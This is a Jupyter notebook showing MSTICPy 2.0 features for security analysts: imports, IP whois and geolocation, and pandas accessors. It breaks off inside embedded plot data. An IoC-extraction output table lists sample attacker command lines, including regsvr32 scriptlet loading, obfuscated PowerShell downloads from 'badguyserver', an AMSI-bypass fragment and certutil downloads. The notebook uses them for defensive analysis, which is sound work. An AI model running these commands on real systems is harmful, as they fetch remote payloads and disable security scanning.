{ "cells": [ { "cell_type": "markdown", "metadata": {}, "source": [ "# What's new in MSTICPy 2.0?\n", "\n", "- Project reorganization\n", "- Import simplification:\n", " - mp.attributes\n", " - init_notebook imports - Entities & Pivots\n", " - pandas accessors\n", "- Time Series pandas accessors\n", "- Threat Intel Lookup Async\n", "- DataFrame to Graph\n", "- Folium map\n", "- Sentinel Workspace configuration\n", "- Pivoting and Data Providers\n", "\n", "\n", "## V2.0.0 Docs available online\n", "https://msticpy.readthedocs.io/en/release-msticpy-v2.0.0/" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Imports simplified\n", "\n", "New \"house style\" - shortening msticpy to \"mp\"\n" ] }, { "cell_type": "code", "execution_count": 86, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "True" ] }, "execution_count": 86, "metadata": {}, "output_type": "execute_result" } ], "source": [ "import msticpy as mp\n", "\n", "mp.init_notebook()" ] }, { "cell_type": "code", "execution_count": null, "metadata": {}, "outputs": [], "source": [] }, { "cell_type": "markdown", "metadata": {}, "source": [ "Many classes and functions are available directly from \"mp\"" ] }, { "cell_type": "code", "execution_count": 89, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "Using Open PageRank. See https://www.domcop.com/openpagerank/what-is-openpagerank\n", "msticpy version installed: 2.0.0rc2 latest published: 1.8.2\n", "Latest version is installed.\n" ] }, { "data": { "text/html": [ "\n", " \n", "

Modules matching 'sentinel'

\n", " \n", " \n", " \n", "\n", "\n", "\n", "\n", "\n", "\n", "\n", "\n", "\n", "
ModuleHelp
msticpy.datamodel.soc.sentinel_alertmsticpy.datamodel.soc.sentinel_alert
msticpy.context.azure.sentinel_utilsmsticpy.context.azure.sentinel_utils
msticpy.config.ce_azure_sentinelmsticpy.config.ce_azure_sentinel
msticpy.context.azure.sentinel_incidentsmsticpy.context.azure.sentinel_incidents
msticpy.context.azure.sentinel_watchlistsmsticpy.context.azure.sentinel_watchlists
msticpy.context.azure.sentinel_coremsticpy.context.azure.sentinel_core
msticpy.context.azure.sentinel_bookmarksmsticpy.context.azure.sentinel_bookmarks
msticpy.context.azure.sentinel_workspacesmsticpy.context.azure.sentinel_workspaces
msticpy.context.azure.sentinel_analyticsmsticpy.context.azure.sentinel_analytics
msticpy.context.azure.sentinel_searchmsticpy.context.azure.sentinel_search
\n", " " ], "text/plain": [ "" ] }, "metadata": {}, "output_type": "display_data" } ], "source": [ "qry_prov = mp.QueryProvider(\"MSSentinel\")\n", "ti = mp.TILookup()\n", "\n", "mp.check_version()\n", "\n", "mp.search(\"sentinel\")" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "`init_notebook` imports many items into the notebook namespace:\n", "- standard packages such as pandas, numpy, ipywidgets\n", "- MSTICPy modules and classes such as **Entities**" ] }, { "cell_type": "code", "execution_count": 92, "metadata": {}, "outputs": [ { "data": { "text/html": [ "
\n", "\n", "\n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", "
asnasn_cidrasn_country_codeasn_dateasn_descriptionasn_registrynetsnirqueryrawraw_referralreferral
01103145.1.0.0/17NL1993-09-01SURFNET-NL SURFnet, The Netherlands, NLripencc[{'cidr': '145.1.0.0/17', 'name': 'NIOZ-NET', 'handle': 'WP1948-RIPE', 'range': '145.1.0.0 - 145...None145.1.10.17NoneNoneNone
\n", "
" ], "text/plain": [ " asn asn_cidr asn_country_code asn_date \\\n", "0 1103 145.1.0.0/17 NL 1993-09-01 \n", "\n", " asn_description asn_registry \\\n", "0 SURFNET-NL SURFnet, The Netherlands, NL ripencc \n", "\n", " nets \\\n", "0 [{'cidr': '145.1.0.0/17', 'name': 'NIOZ-NET', 'handle': 'WP1948-RIPE', 'range': '145.1.0.0 - 145... \n", "\n", " nir query raw raw_referral referral \n", "0 None 145.1.10.17 None None None " ] }, "execution_count": 92, "metadata": {}, "output_type": "execute_result" } ], "source": [ "ip = \"145.1.10.17\"\n", "\n", "IpAddress.whois(ip)" ] }, { "cell_type": "code", "execution_count": 93, "metadata": {}, "outputs": [ { "data": { "text/html": [ "
\n", "\n", "\n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", "
CountryCodeCountryNameLongitudeLatitudeTimeGeneratedTypeIpAddress
0NLNetherlands4.899552.38242022-06-14 16:25:09.670081geolocation145.1.10.17
\n", "
" ], "text/plain": [ " CountryCode CountryName Longitude Latitude TimeGenerated \\\n", "0 NL Netherlands 4.8995 52.3824 2022-06-14 16:25:09.670081 \n", "\n", " Type IpAddress \n", "0 geolocation 145.1.10.17 " ] }, "execution_count": 93, "metadata": {}, "output_type": "execute_result" } ], "source": [ "IpAddress.util.geoloc(ip)" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "### Pandas accessors - more and better organized.\n", "\n", "Most dataframe-related functionality available through:\n", "- df.mp - transforms, data processing\n", "- df.mp_plot - plotting functions: timeline, process tree, etc.\n", "\n", "\n", "`df.mp_timeseries` - is a separate item since it requires non-core dependencies such as `statsmodel`" ] }, { "cell_type": "code", "execution_count": 94, "metadata": {}, "outputs": [ { "data": { "text/html": [ "
\n", "\n", "\n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", "
TenantIdAccountEventIDTimeGeneratedComputerSubjectUserSidSubjectUserNameSubjectDomainNameSubjectLogonIdNewProcessIdNewProcessNameTokenElevationTypeProcessIdCommandLineParentProcessNameTargetLogonIdSourceComputerIdTimeCreatedUtc
0802d39e1-9d70-404d-832c-2de5e2478edaWORKGROUP\\MSTICAlertsWin1$46882019-01-15 05:24:24.010MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x1610C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State\\CT_602681692\\NativeDSC\\De...%%19360x888\"C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State\\CT_602681692\\NativeDSC\\D...C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe0x046fe7078-61bb-4bed-9430-7ac01d91c2732019-01-15 05:24:24.010
1802d39e1-9d70-404d-832c-2de5e2478edaWORKGROUP\\MSTICAlertsWin1$46882019-01-15 05:24:24.023MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x1790C:\\Windows\\System32\\conhost.exe%%19360x1610\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State\\CT_602681692\\NativeDSC\\De...0x046fe7078-61bb-4bed-9430-7ac01d91c2732019-01-15 05:24:24.023
2802d39e1-9d70-404d-832c-2de5e2478edaWORKGROUP\\MSTICAlertsWin1$46882019-01-15 05:24:25.807MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xcd8C:\\Windows\\SysWOW64\\wbem\\WmiPrvSE.exe%%19360x280C:\\Windows\\sysWOW64\\wbem\\wmiprvse.exe -secured -EmbeddingC:\\Windows\\System32\\svchost.exe0x3e446fe7078-61bb-4bed-9430-7ac01d91c2732019-01-15 05:24:25.807
\n", "
" ], "text/plain": [ " TenantId Account EventID \\\n", "0 802d39e1-9d70-404d-832c-2de5e2478eda WORKGROUP\\MSTICAlertsWin1$ 4688 \n", "1 802d39e1-9d70-404d-832c-2de5e2478eda WORKGROUP\\MSTICAlertsWin1$ 4688 \n", "2 802d39e1-9d70-404d-832c-2de5e2478eda WORKGROUP\\MSTICAlertsWin1$ 4688 \n", "\n", " TimeGenerated Computer SubjectUserSid SubjectUserName \\\n", "0 2019-01-15 05:24:24.010 MSTICAlertsWin1 S-1-5-18 MSTICAlertsWin1$ \n", "1 2019-01-15 05:24:24.023 MSTICAlertsWin1 S-1-5-18 MSTICAlertsWin1$ \n", "2 2019-01-15 05:24:25.807 MSTICAlertsWin1 S-1-5-18 MSTICAlertsWin1$ \n", "\n", " SubjectDomainName SubjectLogonId NewProcessId \\\n", "0 WORKGROUP 0x3e7 0x1610 \n", "1 WORKGROUP 0x3e7 0x1790 \n", "2 WORKGROUP 0x3e7 0xcd8 \n", "\n", " NewProcessName \\\n", "0 C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State\\CT_602681692\\NativeDSC\\De... \n", "1 C:\\Windows\\System32\\conhost.exe \n", "2 C:\\Windows\\SysWOW64\\wbem\\WmiPrvSE.exe \n", "\n", " TokenElevationType ProcessId \\\n", "0 %%1936 0x888 \n", "1 %%1936 0x1610 \n", "2 %%1936 0x280 \n", "\n", " CommandLine \\\n", "0 \"C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State\\CT_602681692\\NativeDSC\\D... \n", "1 \\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1 \n", "2 C:\\Windows\\sysWOW64\\wbem\\wmiprvse.exe -secured -Embedding \n", "\n", " ParentProcessName \\\n", "0 C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe \n", "1 C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State\\CT_602681692\\NativeDSC\\De... \n", "2 C:\\Windows\\System32\\svchost.exe \n", "\n", " TargetLogonId SourceComputerId TimeCreatedUtc \n", "0 0x0 46fe7078-61bb-4bed-9430-7ac01d91c273 2019-01-15 05:24:24.010 \n", "1 0x0 46fe7078-61bb-4bed-9430-7ac01d91c273 2019-01-15 05:24:24.023 \n", "2 0x3e4 46fe7078-61bb-4bed-9430-7ac01d91c273 2019-01-15 05:24:25.807 " ] }, "execution_count": 94, "metadata": {}, "output_type": "execute_result" } ], "source": [ "proc_df = pd.read_csv(\"data/processes_on_host.csv\", index_col=0)\n", "proc_df.head(3)" ] }, { "cell_type": "code", "execution_count": 95, "metadata": {}, "outputs": [ { "data": { "text/html": [ "
\n", "\n", "\n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", "
IoCTypeObservableSourceIndexInput
0urlhttp://server/file.sct94.\\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll
1dnsserver94.\\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll
2urlhttps://blah/png','google.png')}104.\\powershell -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t).DownloadFile('https://blah/png','go...
3dnsblah104.\\powershell -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t).DownloadFile('https://blah/png','go...
4urlhttp://somedomain/best-kitten-names-1.jpg'110cmd /c \".\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t...
5dnssomedomain110cmd /c \".\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t...
6urlhttp://badguyserver/pwnme125cmd /c \"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\"
7dnsbadguyserver125cmd /c \"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\"
8urlhttp://badguyserver/pwnme130.\\powershell -Noninteractive -Noprofile -Command \"Invoke-Expression Get-Process; Invoke-WebRequ...
9dnsbadguyserver130.\\powershell -Noninteractive -Noprofile -Command \"Invoke-Expression Get-Process; Invoke-WebRequ...
10urlhttp://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').se...174.\\powershell.exe -command [ref].assembly.gettype('http://system.management.automation.amsiutil...
11dnssystem.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue(...174.\\powershell.exe -command [ref].assembly.gettype('http://system.management.automation.amsiutil...
12ipv41.2.3.4175netsh start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\b...
13ipv4127.0.0.1214certutil -urlcache -split -f http://127.0.0.1/
14urlhttp://127.0.0.1/214certutil -urlcache -split -f http://127.0.0.1/
\n", "
" ], "text/plain": [ " IoCType \\\n", "0 url \n", "1 dns \n", "2 url \n", "3 dns \n", "4 url \n", "5 dns \n", "6 url \n", "7 dns \n", "8 url \n", "9 dns \n", "10 url \n", "11 dns \n", "12 ipv4 \n", "13 ipv4 \n", "14 url \n", "\n", " Observable \\\n", "0 http://server/file.sct \n", "1 server \n", "2 https://blah/png','google.png')} \n", "3 blah \n", "4 http://somedomain/best-kitten-names-1.jpg' \n", "5 somedomain \n", "6 http://badguyserver/pwnme \n", "7 badguyserver \n", "8 http://badguyserver/pwnme \n", "9 badguyserver \n", "10 http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').se... \n", "11 system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue(... \n", "12 1.2.3.4 \n", "13 127.0.0.1 \n", "14 http://127.0.0.1/ \n", "\n", " SourceIndex \\\n", "0 94 \n", "1 94 \n", "2 104 \n", "3 104 \n", "4 110 \n", "5 110 \n", "6 125 \n", "7 125 \n", "8 130 \n", "9 130 \n", "10 174 \n", "11 174 \n", "12 175 \n", "13 214 \n", "14 214 \n", "\n", " Input \n", "0 .\\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll \n", "1 .\\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll \n", "2 .\\powershell -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t).DownloadFile('https://blah/png','go... \n", "3 .\\powershell -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t).DownloadFile('https://blah/png','go... \n", "4 cmd /c \".\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t... \n", "5 cmd /c \".\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t... \n", "6 cmd /c \"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\" \n", "7 cmd /c \"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\" \n", "8 .\\powershell -Noninteractive -Noprofile -Command \"Invoke-Expression Get-Process; Invoke-WebRequ... \n", "9 .\\powershell -Noninteractive -Noprofile -Command \"Invoke-Expression Get-Process; Invoke-WebRequ... \n", "10 .\\powershell.exe -command [ref].assembly.gettype('http://system.management.automation.amsiutil... \n", "11 .\\powershell.exe -command [ref].assembly.gettype('http://system.management.automation.amsiutil... \n", "12 netsh start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\b... \n", "13 certutil -urlcache -split -f http://127.0.0.1/ \n", "14 certutil -urlcache -split -f http://127.0.0.1/ " ] }, "execution_count": 95, "metadata": {}, "output_type": "execute_result" } ], "source": [ "proc_df.mp.ioc_extract(columns=\"CommandLine\", ioc_types=[\"ipv4\", \"url\"])" ] }, { "cell_type": "code", "execution_count": 96, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "Help on method timeline in module msticpy.vis.mp_pandas_plot:\n", "\n", "timeline(**kwargs) -> bokeh.models.layouts.LayoutDOM method of msticpy.vis.mp_pandas_plot.MsticpyPlotAccessor instance\n", " Display a timeline of events.\n", " \n", " Parameters\n", " ----------\n", " time_column : str, optional\n", " Name of the timestamp column\n", " (the default is 'TimeGenerated')\n", " source_columns : list, optional\n", " List of default source columns to use in tooltips\n", " (the default is None)\n", " \n", " Other Parameters\n", " ----------------\n", " title : str, optional\n", " Title to display (the default is None)\n", " alert : SecurityAlert, optional\n", " Add a reference line/label using the alert time (the default is None)\n", " ref_event : Any, optional\n", " Add a reference line/label using the alert time (the default is None)\n", " ref_time : datetime, optional\n", " Add a reference line/label using `ref_time` (the default is None)\n", " group_by : str\n", " The column to group timelines on.\n", " legend: str, optional\n", " \"left\", \"right\", \"inline\" or \"none\"\n", " (the default is to show a legend when plotting multiple series\n", " and not to show one when plotting a single series)\n", " yaxis : bool, optional\n", " Whether to show the yaxis and labels (default is False)\n", " ygrid : bool, optional\n", " Whether to show the yaxis grid (default is False)\n", " xgrid : bool, optional\n", " Whether to show the xaxis grid (default is True)\n", " range_tool : bool, optional\n", " Show the the range slider tool (default is True)\n", " height : int, optional\n", " The height of the plot figure\n", " (the default is auto-calculated height)\n", " width : int, optional\n", " The width of the plot figure (the default is 900)\n", " color : str\n", " Default series color (default is \"navy\")\n", " overlay_data : pd.DataFrame:\n", " A second dataframe to plot as a different series.\n", " overlay_color : str\n", " Overlay series color (default is \"green\")\n", " ref_events : pd.DataFrame, optional\n", " Add references line/label using the event times in the dataframe.\n", " (the default is None)\n", " ref_time_col : str, optional\n", " Add references line/label using the this column in `ref_events`\n", " for the time value (x-axis).\n", " (this defaults the value of the `time_column` parameter or 'TimeGenerated'\n", " `time_column` is None)\n", " ref_col : str, optional\n", " The column name to use for the label from `ref_events`\n", " (the default is None)\n", " ref_times : List[Tuple[datetime, str]], optional\n", " Add one or more reference line/label using (the default is None)\n", " \n", " Returns\n", " -------\n", " LayoutDOM\n", " The bokeh plot figure.\n", "\n" ] } ], "source": [ "help(proc_df.mp_plot.timeline)" ] }, { "cell_type": "code", "execution_count": 97, "metadata": {}, "outputs": [ { "data": { "text/html": [ "\n", "
\n", " \n", " Loading BokehJS ...\n", "
" ] }, "metadata": {}, "output_type": "display_data" }, { "data": { "application/javascript": "\n(function(root) {\n function now() {\n return new Date();\n }\n\n const force = true;\n\n if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n root._bokeh_onload_callbacks = [];\n root._bokeh_is_loading = undefined;\n }\n\n const JS_MIME_TYPE = 'application/javascript';\n const HTML_MIME_TYPE = 'text/html';\n const EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n const CLASS_NAME = 'output_bokeh rendered_html';\n\n /**\n * Render data to the DOM node\n */\n function render(props, node) {\n const script = document.createElement(\"script\");\n node.appendChild(script);\n }\n\n /**\n * Handle when an output is cleared or removed\n */\n function handleClearOutput(event, handle) {\n const cell = handle.cell;\n\n const id = cell.output_area._bokeh_element_id;\n const server_id = cell.output_area._bokeh_server_id;\n // Clean up Bokeh references\n if (id != null && id in Bokeh.index) {\n Bokeh.index[id].model.document.clear();\n delete Bokeh.index[id];\n }\n\n if (server_id !== undefined) {\n // Clean up Bokeh references\n const cmd_clean = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n cell.notebook.kernel.execute(cmd_clean, {\n iopub: {\n output: function(msg) {\n const id = msg.content.text.trim();\n if (id in Bokeh.index) {\n Bokeh.index[id].model.document.clear();\n delete Bokeh.index[id];\n }\n }\n }\n });\n // Destroy server and session\n const cmd_destroy = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n cell.notebook.kernel.execute(cmd_destroy);\n }\n }\n\n /**\n * Handle when a new output is added\n */\n function handleAddOutput(event, handle) {\n const output_area = handle.output_area;\n const output = handle.output;\n\n // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n return\n }\n\n const toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n // store reference to embed id on output_area\n output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n }\n if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n const bk_div = document.createElement(\"div\");\n bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n const script_attrs = bk_div.children[0].attributes;\n for (let i = 0; i < script_attrs.length; i++) {\n toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n }\n // store reference to server id on output_area\n output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n }\n }\n\n function register_renderer(events, OutputArea) {\n\n function append_mime(data, metadata, element) {\n // create a DOM node to render to\n const toinsert = this.create_output_subarea(\n metadata,\n CLASS_NAME,\n EXEC_MIME_TYPE\n );\n this.keyboard_manager.register_events(toinsert);\n // Render to node\n const props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n render(props, toinsert[toinsert.length - 1]);\n element.append(toinsert);\n return toinsert\n }\n\n /* Handle when an output is cleared or removed */\n events.on('clear_output.CodeCell', handleClearOutput);\n events.on('delete.Cell', handleClearOutput);\n\n /* Handle when a new output is added */\n events.on('output_added.OutputArea', handleAddOutput);\n\n /**\n * Register the mime type and append_mime function with output_area\n */\n OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n /* Is output safe? */\n safe: true,\n /* Index of renderer in `output_area.display_order` */\n index: 0\n });\n }\n\n // register the mime type if in Jupyter Notebook environment and previously unregistered\n if (root.Jupyter !== undefined) {\n const events = require('base/js/events');\n const OutputArea = require('notebook/js/outputarea').OutputArea;\n\n if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n register_renderer(events, OutputArea);\n }\n }\n\n \n if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n root._bokeh_timeout = Date.now() + 5000;\n root._bokeh_failed_load = false;\n }\n\n const NB_LOAD_WARNING = {'data': {'text/html':\n \"
\\n\"+\n \"

\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"

\\n\"+\n \"\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"\\n\"+\n \"
\"}};\n\n function display_loaded() {\n const el = document.getElementById(\"4809\");\n if (el != null) {\n el.textContent = \"BokehJS is loading...\";\n }\n if (root.Bokeh !== undefined) {\n if (el != null) {\n el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n }\n } else if (Date.now() < root._bokeh_timeout) {\n setTimeout(display_loaded, 100)\n }\n }\n\n\n function run_callbacks() {\n try {\n root._bokeh_onload_callbacks.forEach(function(callback) {\n if (callback != null)\n callback();\n });\n } finally {\n delete root._bokeh_onload_callbacks\n }\n console.debug(\"Bokeh: all callbacks have finished\");\n }\n\n function load_libs(css_urls, js_urls, callback) {\n if (css_urls == null) css_urls = [];\n if (js_urls == null) js_urls = [];\n\n root._bokeh_onload_callbacks.push(callback);\n if (root._bokeh_is_loading > 0) {\n console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n return null;\n }\n if (js_urls == null || js_urls.length === 0) {\n run_callbacks();\n return null;\n }\n console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n function on_load() {\n root._bokeh_is_loading--;\n if (root._bokeh_is_loading === 0) {\n console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n run_callbacks()\n }\n }\n\n function on_error(url) {\n console.error(\"failed to load \" + url);\n }\n\n for (let i = 0; i < css_urls.length; i++) {\n const url = css_urls[i];\n const element = document.createElement(\"link\");\n element.onload = on_load;\n element.onerror = on_error.bind(null, url);\n element.rel = \"stylesheet\";\n element.type = \"text/css\";\n element.href = url;\n console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n document.body.appendChild(element);\n }\n\n for (let i = 0; i < js_urls.length; i++) {\n const url = js_urls[i];\n const element = document.createElement('script');\n element.onload = on_load;\n element.onerror = on_error.bind(null, url);\n element.async = false;\n element.src = url;\n console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n document.head.appendChild(element);\n }\n };\n\n function inject_raw_css(css) {\n const element = document.createElement(\"style\");\n element.appendChild(document.createTextNode(css));\n document.body.appendChild(element);\n }\n\n \n const js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.4.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.4.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.4.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.4.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-mathjax-2.4.2.min.js\"];\n const css_urls = [];\n \n\n const inline_js = [\n function(Bokeh) {\n Bokeh.set_log_level(\"info\");\n },\n function(Bokeh) {\n \n \n }\n ];\n\n function run_inline_js() {\n \n if (root.Bokeh !== undefined || force === true) {\n \n for (let i = 0; i < inline_js.length; i++) {\n inline_js[i].call(root, root.Bokeh);\n }\n if (force === true) {\n display_loaded();\n }} else if (Date.now() < root._bokeh_timeout) {\n setTimeout(run_inline_js, 100);\n } else if (!root._bokeh_failed_load) {\n console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n root._bokeh_failed_load = true;\n } else if (force !== true) {\n const cell = $(document.getElementById(\"4809\")).parents('.cell').data().cell;\n cell.output_area.append_execute_result(NB_LOAD_WARNING)\n }\n\n }\n\n if (root._bokeh_is_loading === 0) {\n console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n run_inline_js();\n } else {\n load_libs(css_urls, js_urls, function() {\n console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n run_inline_js();\n });\n }\n}(window));", "application/vnd.bokehjs_load.v0+json": "" }, "metadata": {}, "output_type": "display_data" }, { "data": { "text/html": [ "\n", "\n", "\n", "\n", "\n", "\n", "
\n" ] }, "metadata": {}, "output_type": "display_data" }, { "data": { "application/javascript": "(function(root) {\n function embed_document(root) {\n \n const docs_json = {\"c7dbd89b-c893-4780-9734-316224a29fae\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"4813\"},{\"id\":\"4845\"}]},\"id\":\"4898\",\"type\":\"Column\"},{\"attributes\":{},\"id\":\"4835\",\"type\":\"SaveTool\"},{\"attributes\":{},\"id\":\"4910\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"end\":1547530280011.0,\"start\":1547525311999.0},\"id\":\"4816\",\"type\":\"Range1d\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"4926\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"4927\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"4911\",\"type\":\"Selection\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"4928\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"4937\",\"type\":\"YearsTicker\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"4933\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"end\":1547530487011.5,\"start\":1547525104998.5},\"id\":\"4848\",\"type\":\"Range1d\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"4932\",\"type\":\"DaysTicker\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"4929\",\"type\":\"DaysTicker\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"4930\",\"type\":\"DaysTicker\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"4931\",\"type\":\"DaysTicker\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"4936\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"months\":[0,2